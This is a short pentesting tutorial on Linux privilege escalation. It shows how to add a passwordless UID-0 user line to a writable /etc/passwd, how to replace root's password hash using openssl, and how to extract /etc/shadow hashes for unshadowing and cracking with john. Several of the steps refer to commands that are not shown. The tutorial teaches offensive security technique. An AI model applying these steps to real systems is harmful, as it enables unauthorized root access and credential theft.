Files Privilege Escalation - Linux PE.
Linux Privilege escalation sensitive files.
There are various sensitive files within a system that can lead us to privilege escalation. Below, some of these escalations are detailed.
/etc/passwd
If we have write permissions in the /etc/passwd file we can perform two different types of attack.
Creating a new user.
We can just write a new user with root privileges.
pentester: -> Username.
::: -> No password.
0: -> User ID (UID). If UID = 0 means that our user has superuser privileges.
0: -> Group ID (GID). If GID = 0 means that we are part of the root group.
,,,:: -> Empty camps.
/: -> Home directory.
/bin/bash -> User shell.
1
pentester::0:0:,,,:/:/bin/bash
Changing root password.
The second technique we are going to exploit is very similar. The difference between them resides in the fact that instead of creating a new user, this time we are going to change root password. In our local machine we are going to execute openssl to create the new password:
1
openssl passwd <newPassword>
And then we just have to switch the x in the password field.
/etc/shadow Privilege Escalation.
If we can read the /etc/shadow file we can try to crack the hashes from the users.
Detection.
In the next scenario we can see that we have reading privileges for the /etc/passwd file.
Exploitation.
Obtaining the hashes.
We need to get the line on /etc/shadow of the user we want to crack:
And we do the same with /etc/passwd:
We have to send the files back to our system. To do so, we can use different techniques depending on the situation we are facing.
Unshadowing
Once in our Attacker machine we have to unshadow the files as follows:
Cracking hashes.
Finally we will make the brute force using john.